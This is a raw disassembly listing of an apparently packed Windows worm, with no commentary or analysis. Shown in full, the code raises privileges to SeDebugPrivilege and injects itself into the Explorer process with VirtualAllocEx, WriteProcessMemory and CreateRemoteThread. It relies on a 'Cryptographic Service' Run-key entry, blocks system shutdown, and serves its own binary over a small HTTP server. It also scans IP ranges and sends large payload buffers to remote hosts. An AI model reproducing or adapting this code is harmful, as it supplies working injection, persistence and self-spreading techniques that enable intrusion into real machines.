push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
push 0
push 0A8h
push offset dword_3142460C
push [ebp+var_4]
call ebx ; dword_31421168
push edi
call esi ; dword_31421094
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
push 0
push 0DEh
push offset dword_314246B8
push [ebp+var_4]
call ebx ; dword_31421168
push edi
call esi ; dword_31421094
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
cmp eax, 46h
jl loc_31421D4C
cmp [ebp+var_730], 31h
jnz loc_31421BF7
and [ebp+arg_0], 0
push 7D0h
lea eax, [ebp+var_F44]
push 90h
push eax
call sub_31422CD6 ; memset
add esp, 0Ch
push offset byte_314242B8
call dword_31421084 ; lstrlenA
push eax
lea eax, [ebp+var_EA4]
push offset byte_314242B8
push eax
call sub_31422CE2 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_14]
push eax
call dword_31421084 ; lstrlenA
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_788]
push eax
call sub_31422CE2 ; memcpy
mov eax, dword_31424BBE
add esp, 0Ch
mov [ebp+var_798], eax
loc_31421A98: ; CODE XREF: sub_31421801+4E1�j
movsx eax, [ebp+var_5]
add eax, 4
push 0
push eax
lea eax, [ebp+var_E4]
push eax
push [ebp+var_4]
call ebx ; dword_31421168
push edi
call esi ; dword_31421094
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
push 0
push 68h
push offset dword_314247FC
push [ebp+var_4]
call ebx ; dword_31421168
push edi
call esi ; dword_31421094
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
push 0
push 0A0h
push offset dword_31424868
push [ebp+var_4]
call ebx ; dword_31421168
push edi
call esi ; dword_31421094
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
cmp [ebp+arg_0], 0
jz loc_31421CE7
push 68h
lea eax, [ebp+var_89E4]
push offset dword_31424A20
push eax
call sub_31422CE2 ; memcpy
lea eax, [ebp+var_4834]
push 1B5Ah
push eax
lea eax, [ebp+var_897C]
push eax
call sub_31422CE2 ; memcpy
push 70h
lea eax, [ebp+var_690C]
push offset dword_31424A8C
push eax
call sub_31422CE2 ; memcpy
lea eax, [ebp+var_37A0]
push 0A5Eh
push eax
lea eax, [ebp+var_689C]
push eax
call sub_31422CE2 ; memcpy
push 84h
lea eax, [ebp+var_5DD8]
push offset dword_31424B00
push eax
call sub_31422CE2 ; memcpy
add esp, 3Ch
lea eax, [ebp+var_89E4]
push 0
push 10FCh
push eax
push [ebp+var_4]
call ebx ; dword_31421168
push edi
call esi ; dword_31421094
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
push 0
push 0FDCh
lea eax, [ebp+var_690C]
jmp loc_31421D3F
; ---------------------------------------------------------------------------
loc_31421BF7: ; CODE XREF: sub_31421801+22B�j
push 0DACh
lea eax, [ebp+var_2CD8]
push 90h
push eax
mov [ebp+arg_0], 1
call sub_31422CD6 ; memset
push 4
lea eax, [ebp+var_24F4]
push offset dword_31424BF8
push eax
call sub_31422CE2 ; memcpy
push offset byte_314242B8
call sub_31422CDC ; strlen
push eax
lea eax, [ebp+var_24E4]
push offset byte_314242B8
push eax
call sub_31422CE2 ; memcpy
push 4
lea eax, [ebp+var_21C0]
push offset loc_31424C70
push eax
call sub_31422CE2 ; memcpy
push 4
lea eax, [ebp+var_21BC]
push offset dword_31424BF8
push eax
call sub_31422CE2 ; memcpy
add esp, 40h
push offset byte_314242B8
call sub_31422CDC ; strlen
push eax
lea eax, [ebp+var_21B0]
push offset byte_314242B8
push eax
call sub_31422CE2 ; memcpy
add esp, 10h
xor ecx, ecx
lea eax, [ebp+var_4833]
loc_31421C93: ; CODE XREF: sub_31421801+4A8�j
mov dl, [ebp+ecx+var_2CD8]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 0DACh
jl short loc_31421C93
and [ebp+var_2CDC], 0
and [ebp+var_2CDB], 0
push 1C52h
lea eax, [ebp+var_89E4]
push 31h
push eax
call sub_31422CD6 ; memset
push 1C52h
lea eax, [ebp+var_690C]
push 31h
push eax
call sub_31422CD6 ; memset
add esp, 18h
jmp loc_31421A98
; ---------------------------------------------------------------------------
loc_31421CE7: ; CODE XREF: sub_31421801+339�j
push 7Ch
lea eax, [ebp+var_1F28]
push offset dword_3142490C
push eax
call sub_31422CE2 ; memcpy
lea eax, [ebp+var_F44]
push 7D0h
push eax
lea eax, [ebp+var_1EAC]
push eax
call sub_31422CE2 ; memcpy
push 90h
lea eax, [ebp+var_16DC]
push offset dword_3142498C
push eax
call sub_31422CE2 ; memcpy
add esp, 24h
and [ebp+var_1231], 0
lea eax, [ebp+var_1F28]
push 0
push 0CF8h
loc_31421D3F: ; CODE XREF: sub_31421801+3F1�j
push eax
push [ebp+var_4]
call ebx ; dword_31421168
push edi
call esi ; dword_31421094
and [ebp+var_C], 0
loc_31421D4C: ; CODE XREF: sub_31421801+1AD�j
; sub_31421801+1E1�j ...
push 2
push [ebp+var_4]
call dword_31421170 ; shutdown
loc_31421D57: ; CODE XREF: sub_31421801+166�j
push [ebp+var_4]
call dword_31421174 ; closesocket
pop esi
loc_31421D61: ; CODE XREF: sub_31421801+37�j
mov eax, [ebp+var_C]
pop edi
pop ebx
leave
retn
sub_31421801 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421D68 proc near ; CODE XREF: UPX0:loc_31422376�p
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
push edi
push offset aAdvapi32 ; "advapi32"
call dword_314210A8 ; LoadLibraryA
mov esi, dword_314210A4
mov edi, eax
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; dword_314210A4
test eax, eax
mov [ebp+var_4], eax
jz short loc_31421DEC
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
call esi ; dword_314210A4
test eax, eax
mov [ebp+var_8], eax
jz short loc_31421DEC
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
call esi ; dword_314210A4
mov esi, eax
test esi, esi
jz short loc_31421DEC
lea eax, [ebp+var_C]
push eax
push 20h
call dword_314210A0 ; GetCurrentProcess
push eax
call [ebp+var_4]
lea eax, [ebp+var_18]
mov [ebp+var_1C], 1
push eax
push offset aSedebugprivile ; "SeDebugPrivilege"
push 0
mov [ebp+var_10], 2
call [ebp+var_8]
push 0
push 0
lea eax, [ebp+var_1C]
push 10h
push eax
push 0
push [ebp+var_C]
call esi ; GetProcAddress
loc_31421DEC: ; CODE XREF: sub_31421D68+28�j
; sub_31421D68+37�j ...
pop edi
pop esi
leave
retn
sub_31421D68 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421DF0 proc near ; CODE XREF: UPX0:3142238A�p
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
mov ecx, dword_31425000
and [ebp+var_4], 0
push ebx
push esi
mov eax, [ecx+3Ch]
push edi
add eax, ecx
push offset aKernel32 ; "kernel32"
mov ecx, [eax+34h]
mov edi, [eax+50h]
mov [ebp+var_C], ecx
call dword_314210B4 ; GetModuleHandleA
mov esi, dword_314210A4
mov ebx, eax
push offset aVirtualallocex ; "VirtualAllocEx"
push ebx
call esi ; dword_314210A4
test eax, eax
mov [ebp+var_10], eax
jnz short loc_31421E37
loc_31421E33: ; CODE XREF: sub_31421DF0+54�j
push 1
jmp short loc_31421E88
; ---------------------------------------------------------------------------
loc_31421E37: ; CODE XREF: sub_31421DF0+41�j
push offset aCreateremoteth ; "CreateRemoteThread"
push ebx
call esi ; dword_314210A4
test eax, eax
mov [ebp+var_14], eax
jz short loc_31421E33
push 0
push offset aShell_traywnd ; "Shell_TrayWnd"
call dword_31421110 ; FindWindowA
test eax, eax
jnz short loc_31421E65
call dword_31421114 ; GetForegroundWindow
test eax, eax
jnz short loc_31421E65
push 2
jmp short loc_31421E88
; ---------------------------------------------------------------------------
loc_31421E65: ; CODE XREF: sub_31421DF0+65�j
; sub_31421DF0+6F�j
lea ecx, [ebp+var_8]
push ecx
push eax
call dword_31421118 ; GetWindowThreadProcessId
push [ebp+var_8]
push 0
push 42Ah
call dword_314210B0 ; OpenProcess
mov ebx, eax
test ebx, ebx
jnz short loc_31421E8B
push 3
loc_31421E88: ; CODE XREF: sub_31421DF0+45�j
; sub_31421DF0+73�j
pop eax
jmp short loc_31421EF6
; ---------------------------------------------------------------------------
loc_31421E8B: ; CODE XREF: sub_31421DF0+94�j
push 4
push 3000h
push edi
push [ebp+var_C]
push ebx
call [ebp+var_10]
mov esi, dword_3142107C
test eax, eax
jz short loc_31421EE9
lea ecx, [ebp+var_10]
push ecx
push edi
push eax
push eax
push ebx
call dword_314210AC ; WriteProcessMemory
push dword_31424FF4
call esi ; dword_3142107C
lea eax, [ebp+var_18]
xor edi, edi
push eax
push edi
push 1
push [ebp+arg_0]
push edi
push edi
push ebx
call [ebp+var_14]
cmp eax, edi
jz short loc_31421ED5
push eax
call esi ; dword_3142107C
jmp short loc_31421EF0
; ---------------------------------------------------------------------------
loc_31421ED5: ; CODE XREF: sub_31421DF0+DE�j
push offset aUterm19 ; "uterm19"
call sub_31421F29
pop ecx
mov [ebp+var_4], 5
jmp short loc_31421EF0
; ---------------------------------------------------------------------------
loc_31421EE9: ; CODE XREF: sub_31421DF0+B2�j
mov [ebp+var_4], 4
loc_31421EF0: ; CODE XREF: sub_31421DF0+E3�j
; sub_31421DF0+F7�j
push ebx
call esi ; dword_3142107C
mov eax, [ebp+var_4]
loc_31421EF6: ; CODE XREF: sub_31421DF0+99�j
pop edi
pop esi
pop ebx
leave
retn
sub_31421DF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421EFB proc near ; CODE XREF: sub_314221C4+B�p
; UPX0:3142234C�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
pusha
rdtsc
mov [ebp+var_8], eax
popa
mov [ebp+var_4], esp
call dword_314210B8 ; GetTickCount
mov ecx, [ebp+var_4]
imul ecx, [ebp+var_8]
add eax, ecx
push eax
call dword_314210EC ; srand
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_31421EFB endp
; =============== S U B R O U T I N E =======================================
sub_31421F29 proc near ; CODE XREF: sub_31421DF0+EA�p
; UPX0:31422356�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 1
push 0
call dword_314210BC ; CreateMutexA
retn
sub_31421F29 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421F38 proc near ; CODE XREF: sub_314223B2+155�p
; sub_314223B2+160�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_314210C0 ; CreateThread
pop ebp
retn
sub_31421F38 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421F52 proc near ; CODE XREF: sub_314221C4+12C�p
; sub_314225C3+5A�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_314210C0 ; CreateThread
push eax
call dword_3142107C ; CloseHandle
pop ebp
retn
sub_31421F52 endp
; =============== S U B R O U T I N E =======================================
sub_31421F73 proc near ; CODE XREF: sub_314211A0+68�p
; sub_31422A9B+3B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
push esi
push edi
mov edi, [esp+0Ch+arg_4]
xor esi, esi
test edi, edi
jle short loc_31421F9B
loc_31421F84: ; CODE XREF: sub_31421F73+26�j
call dword_314210FC ; rand
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [esi+ebx], dl
inc esi
cmp esi, edi
jl short loc_31421F84
loc_31421F9B: ; CODE XREF: sub_31421F73+F�j
and byte ptr [ebx+edi], 0
pop edi
pop esi
pop ebx
retn
sub_31421F73 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421FA3 proc near ; CODE XREF: sub_314211A0+105�p
var_54 = dword ptr -54h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 54h
push esi
push edi
push 44h
xor esi, esi
pop edi
lea eax, [ebp+var_54]
push edi
push esi
push eax
call sub_31422CD6 ; memset
mov ax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_24], ax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
push esi
push esi
push esi
push esi
push esi
push esi
mov [ebp+var_54], edi
push [ebp+arg_0]
push esi
call dword_314210C4 ; CreateProcessA
push [ebp+var_C]
mov esi, dword_3142107C
mov edi, eax
call esi ; dword_3142107C
push [ebp+var_10]
call esi ; dword_3142107C
mov eax, edi
pop edi
pop esi
leave
retn
sub_31421FA3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421FF9 proc near ; CODE XREF: sub_3142264B+3E�p
; sub_31422712+7�p ...
var_34 = byte ptr -34h
push ebp
mov ebp, esp
sub esp, 34h
lea eax, [ebp+var_34]
push 31h
push eax
call dword_3142114C ; gethostname
cmp eax, 0FFFFFFFFh
jnz short loc_3142201A
call dword_31421150 ; WSAGetLastError
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_3142201A: ; CODE XREF: sub_31421FF9+15�j
lea eax, [ebp+var_34]
push eax
call dword_31421154 ; gethostbyname
test eax, eax
jnz short loc_3142202F
mov eax, 100007Fh
leave
retn
; ---------------------------------------------------------------------------
loc_3142202F: ; CODE XREF: sub_31421FF9+2D�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
leave
retn
sub_31421FF9 endp
; =============== S U B R O U T I N E =======================================
sub_31422038 proc near ; CODE XREF: sub_314216A2+12�p
; sub_3142255F+22�p ...
var_4 = byte ptr -4
push ecx
lea eax, [esp+4+var_4]
push 0
push eax
call dword_31421130 ; InternetGetConnectedState
neg eax
sbb eax, eax
neg eax
pop ecx
retn
sub_31422038 endp
; =============== S U B R O U T I N E =======================================
sub_3142204E proc near ; CODE XREF: sub_314223B2+E6�p
arg_0 = dword ptr 4
push [esp+arg_0]
push 0
push 2
call dword_314210CC ; OpenEventA
test eax, eax
jz short locret_31422067
push eax
call dword_314210C8 ; SetEvent
locret_31422067: ; CODE XREF: sub_3142204E+10�j
retn
sub_3142204E endp
; =============== S U B R O U T I N E =======================================
sub_31422068 proc near ; CODE XREF: sub_314216A2+68�p
push esi
mov esi, dword_314210FC
push edi
call esi ; dword_314210FC
mov edi, eax
shl edi, 10h
call esi ; dword_314210FC
or eax, edi
pop edi
pop esi
retn
sub_31422068 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142207E proc near ; DATA XREF: sub_314221C4+127�o
var_200 = byte ptr -200h
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
xor edi, edi
lea eax, [ebp+var_100]
push edi
push 100h
push eax
push ebx
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jnz short loc_314220AF
push 1
jmp loc_3142216A
; ---------------------------------------------------------------------------
loc_314220AF: ; CODE XREF: sub_3142207E+28�j
mov esi, dword_31421104
lea eax, [ebp+var_100]
push offset aGet ; "GET"
push eax
call esi ; dword_31421104
pop ecx
test eax, eax
pop ecx
jz loc_3142217A
lea eax, [ebp+var_100]
push offset dword_314241F0
push eax
call esi ; dword_31421104
pop ecx
test eax, eax
pop ecx
jz loc_3142217A
mov esi, dword_31421168
push 0
push 3Dh
push offset aHttp1_1200OkCo ; "HTTP/1.1 200 OK\r\nContent-Type: applicat"...
push ebx
call esi ; dword_31421168
push dword_31424FF0
lea eax, [ebp+var_200]
push offset aContentLengthU ; "Content-Length: %u\r\n\r\n"
push eax
call dword_3142111C ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_200]
push 0
push eax
call sub_31422CDC ; strlen
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push ebx
call esi ; dword_31421168
loc_3142212C: ; CODE XREF: sub_3142207E+E8�j
mov eax, dword_31424FF0
mov ecx, 1000h
sub eax, edi
cmp eax, ecx
jb short loc_3142213E
mov eax, ecx
loc_3142213E: ; CODE XREF: sub_3142207E+BC�j
test eax, eax
jz short loc_3142216D
push 0
push eax
mov eax, dword_31424FE8
add eax, edi
push eax
push ebx
call esi ; dword_31421168
cmp eax, 0FFFFFFFFh
jz short loc_31422168
cmp eax, 1000h
jb short loc_3142216D
push 64h
add edi, eax
call dword_31421094 ; Sleep
jmp short loc_3142212C
; ---------------------------------------------------------------------------
loc_31422168: ; CODE XREF: sub_3142207E+D5�j
push 2
loc_3142216A: ; CODE XREF: sub_3142207E+2C�j
pop eax
jmp short loc_314221BD
; ---------------------------------------------------------------------------
loc_3142216D: ; CODE XREF: sub_3142207E+C2�j
; sub_3142207E+DC�j
push offset dword_31424FEC
call dword_314210D4 ; InterlockedIncrement
jmp short loc_31422198
; ---------------------------------------------------------------------------
loc_3142217A: ; CODE XREF: sub_3142207E+49�j
; sub_3142207E+61�j
mov esi, dword_31421168
push 0
push 15h
push offset aHttp1_1200Ok ; "HTTP/1.1 200 OK\r\n\r\n\r\n"
push ebx
call esi ; dword_31421168
push 0
push 3
push offset dword_31424D38
push ebx
call esi ; dword_31421168
loc_31422198: ; CODE XREF: sub_3142207E+FA�j
push 7D0h
call dword_31421094 ; Sleep
push 2
push ebx
call dword_31421170 ; shutdown
push ebx
call dword_31421174 ; closesocket
push 0
call dword_314210D0 ; ExitThread
xor eax, eax
loc_314221BD: ; CODE XREF: sub_3142207E+ED�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_3142207E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314221C4 proc near ; DATA XREF: sub_314223B2+150�o
var_130 = byte ptr -130h
var_28 = byte ptr -28h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 130h
push ebx
push edi
call sub_31421EFB
lea eax, [ebp+var_130]
push 104h
push eax
push offset aCryptographicS ; "Cryptographic Service"
xor ebx, ebx
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
mov dword_31424FEC, ebx
call sub_31422882
add esp, 14h
test eax, eax
jnz loc_314222F9
push esi
push ebx
push ebx
push 3
push ebx
push 1
lea eax, [ebp+var_130]
push 80000000h
push eax
call dword_31421080 ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_31422230
push 1
call dword_314210D0 ; ExitThread
loc_31422230: ; CODE XREF: sub_314221C4+62�j
push ebx
push esi
call dword_314210DC ; GetFileSize
push eax
mov dword_31424FF0, eax
call sub_31422CA5
pop ecx
mov dword_31424FE8, eax
lea ecx, [ebp+var_4]
push ebx
push ecx
push dword_31424FF0
push eax
push esi
call dword_314210D8 ; ReadFile
mov eax, [ebp+var_4]
push esi
mov dword_31424FF0, eax
call dword_3142107C ; CloseHandle
push ebx
push 1
push 2
call dword_31421158 ; socket
push 10h
mov edi, eax
pop esi
lea eax, [ebp+var_18]
push esi
push ebx
push eax
call sub_31422CD6 ; memset
add esp, 0Ch
mov [ebp+var_18], 2
mov [ebp+var_14], ebx
loc_31422292: ; CODE XREF: sub_314221C4+E5�j
; sub_314221C4+ED�j ...
call dword_314210FC ; rand
add eax, 7D0h
and eax, 1FFFh
cmp al, bl
mov dword_31424FFC, eax
jz short loc_31422292
xor ecx, ecx
mov cl, ah
test cl, cl
jz short loc_31422292
push eax
call dword_31421160 ; ntohs
mov [ebp+var_16], ax
lea eax, [ebp+var_18]
push esi
push eax
push edi
call dword_31421140 ; bind
test eax, eax
jnz short loc_31422292
push 64h
push edi
call dword_31421144 ; listen
mov [ebp+var_8], esi
pop esi
loc_314222DB: ; CODE XREF: sub_314221C4+133�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_28]
push eax
push edi
call dword_31421148 ; accept
push eax
push offset sub_3142207E
call sub_31421F52
pop ecx
pop ecx
jmp short loc_314222DB
; ---------------------------------------------------------------------------
loc_314222F9: ; CODE XREF: sub_314221C4+3D�j
push ebx
call dword_314210D0 ; ExitThread
pop edi
xor eax, eax
pop ebx
leave
retn 4
sub_314221C4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31422308 proc near ; CODE XREF: sub_314223B2:loc_314224FC�p
var_190 = byte ptr -190h
push ebp
mov ebp, esp
sub esp, 190h
lea eax, [ebp+var_190]
push esi
mov esi, dword_3142113C
push eax
push 2
call esi ; dword_3142113C
lea eax, [ebp+var_190]
push eax
push 102h
call esi ; dword_3142113C
pop esi
leave
retn
sub_31422308 endp
; ---------------------------------------------------------------------------
loc_31422334: ; CODE XREF: UPX1:31427D08�j
push 0
call dword_314210B4 ; GetModuleHandleA
push offset aFtpupd_exe ; "ftpupd.exe"
mov dword_31425000, eax
call dword_31421074 ; DeleteFileA
call sub_31421EFB
push offset aUterm19 ; "uterm19"
call sub_31421F29
pop ecx
mov dword_31424FF4, eax
call dword_314210E4 ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_31422376
push 1
call dword_314210E0 ; ExitProcess
loc_31422376: ; CODE XREF: UPX0:3142236C�j
call sub_31421D68
call sub_314229E6
call sub_31422B67
push offset sub_314223B2
call sub_31421DF0
test eax, eax
pop ecx
jz short loc_3142239B
push 0
call sub_314223B2
loc_3142239B: ; CODE XREF: UPX0:31422392�j
xor eax, eax
retn
; =============== S U B R O U T I N E =======================================
sub_3142239E proc near ; CODE XREF: sub_314223B2:loc_31422525�p
; sub_3142255F:loc_31422578�p ...
push 0
push dword_31424FF8
call dword_31421070 ; WaitForSingleObject
neg eax
sbb eax, eax
inc eax
retn
sub_3142239E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314223B2 proc near ; CODE XREF: UPX0:31422396�p
; DATA XREF: UPX0:31422385�o
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_31421190
push offset loc_31422CD0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 64h
push ebx
push esi
push edi
mov [ebp+var_70], offset aU10x ; "u10x"
mov [ebp+var_6C], offset aU11x ; "u11x"
mov [ebp+var_68], offset aU12x ; "u12x"
mov [ebp+var_64], offset aU13x ; "u13x"
mov [ebp+var_60], offset aU14x ; "u14x"
mov [ebp+var_5C], offset aU15x ; "u15x"
mov [ebp+var_58], offset aU16x ; "u16x"
mov [ebp+var_54], offset aU17x ; "u17x"
mov [ebp+var_50], offset aU18x ; "u18x"
mov [ebp+var_4C], offset aU8 ; "u8"
mov [ebp+var_48], offset aU9 ; "u9"
mov [ebp+var_44], offset aU10 ; "u10"
mov [ebp+var_40], offset aU11 ; "u11"
mov [ebp+var_3C], offset aU12 ; "u12"
mov [ebp+var_38], offset aU13 ; "u13"
mov [ebp+var_34], offset aU13i ; "u13i"
mov [ebp+var_30], offset aU14 ; "u14"
mov [ebp+var_2C], offset aU15 ; "u15"
mov [ebp+var_28], offset aU16 ; "u16"
mov [ebp+var_24], offset aU17 ; "u17"
mov [ebp+var_20], offset aU18 ; "u18"
mov [ebp+var_1C], offset aU19 ; "u19"
push offset aU19x ; "u19x"
xor edi, edi
push edi
push 1
push edi
call dword_3142106C ; CreateEventA
mov dword_31424FF8, eax
mov [ebp+var_4], edi
mov [ebp+var_74], edi
loc_3142248B: ; CODE XREF: sub_314223B2+EF�j
cmp [ebp+var_74], 9
jnb short loc_314224A3
mov eax, [ebp+var_74]
push [ebp+eax*4+var_70]
call sub_3142204E
pop ecx
inc [ebp+var_74]
jmp short loc_3142248B
; ---------------------------------------------------------------------------
loc_314224A3: ; CODE XREF: sub_314223B2+DD�j
mov [ebp+var_74], edi
loc_314224A6: ; CODE XREF: sub_314223B2+10A�j
cmp [ebp+var_74], 0Dh
jnb short loc_314224BE
mov eax, [ebp+var_74]
push [ebp+eax*4+var_4C]
call sub_31421F29
pop ecx
inc [ebp+var_74]
jmp short loc_314224A6
; ---------------------------------------------------------------------------
loc_314224BE: ; CODE XREF: sub_314223B2+F8�j
cmp [ebp+arg_0], edi
jz short loc_314224FC
push offset aWs2_32 ; "ws2_32"
mov esi, dword_314210A8
call esi ; dword_314210A8
push offset aWininet ; "wininet"
call esi ; dword_314210A8
push offset aMsvcrt ; "msvcrt"
call esi ; dword_314210A8
push offset aAdvapi32 ; "advapi32"
call esi ; dword_314210A8
push offset aUser32 ; "user32"
call esi ; dword_314210A8
push offset aUterm19 ; "uterm19"
call sub_31421F29
pop ecx
mov dword_31424FF4, eax
loc_314224FC: ; CODE XREF: sub_314223B2+10F�j
call sub_31422308
push edi
push offset sub_314221C4
call sub_31421F38
push edi
push offset sub_314216A2
call sub_31421F38
push edi
push offset loc_3142276E
call sub_31421F38
add esp, 18h
loc_31422525: ; CODE XREF: sub_314223B2+18E�j
call sub_3142239E
test eax, eax
jnz short loc_31422542
push edi
call dword_31421018 ; AbortSystemShutdownA
push 1388h
call dword_31421094 ; Sleep
jmp short loc_31422525
; ---------------------------------------------------------------------------
loc_31422542: ; CODE XREF: sub_314223B2+17A�j
or [ebp+var_4], 0FFFFFFFFh
call nullsub_2
xor eax, eax
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_314223B2 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142255F proc near ; DATA XREF: sub_314225C3+55�o
; sub_3142264B+6A�o ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_3142256E
push 1
pop eax
jmp short locret_314225BF
; ---------------------------------------------------------------------------
loc_3142256E: ; CODE XREF: sub_3142255F+8�j
mov al, byte ptr [ebp+arg_0+3]
push ebx
push esi
mov [ebp+var_1], al
xor bl, bl
loc_31422578: ; CODE XREF: sub_3142255F+5A�j
call sub_3142239E
test eax, eax
jnz short loc_314225BB
call sub_31422038
test eax, eax
jz short loc_314225BB
cmp [ebp+var_1], bl
jz short loc_314225B4
mov byte ptr [ebp+arg_0+3], bl
push [ebp+arg_0]
call sub_31421801
movzx esi, word_3142500C
pop ecx
call dword_314210FC ; rand
cdq
idiv esi
add edx, esi
push edx
call dword_31421094 ; Sleep
loc_314225B4: ; CODE XREF: sub_3142255F+2E�j
inc bl
cmp bl, 0FFh
jb short loc_31422578
loc_314225BB: ; CODE XREF: sub_3142255F+20�j
; sub_3142255F+29�j
pop esi
xor eax, eax
pop ebx
locret_314225BF: ; CODE XREF: sub_3142255F+D�j
leave
retn 4
sub_3142255F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314225C3 proc near ; DATA XREF: sub_3142264B+7E�o
; UPX0:31422803�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_314225D1
push 1
pop eax
jmp short loc_31422647
; ---------------------------------------------------------------------------
loc_314225D1: ; CODE XREF: sub_314225C3+7�j
push ebx
push esi
push edi
call sub_31421EFB
mov esi, dword_314210FC
xor ebx, ebx
loc_314225E1: ; CODE XREF: sub_314225C3+7D�j
call sub_3142239E
test eax, eax
jnz short loc_31422642
call sub_31422038
test eax, eax
jz short loc_31422642
call esi ; dword_314210FC
mov byte ptr [ebp+arg_0+2], al
call esi ; dword_314210FC
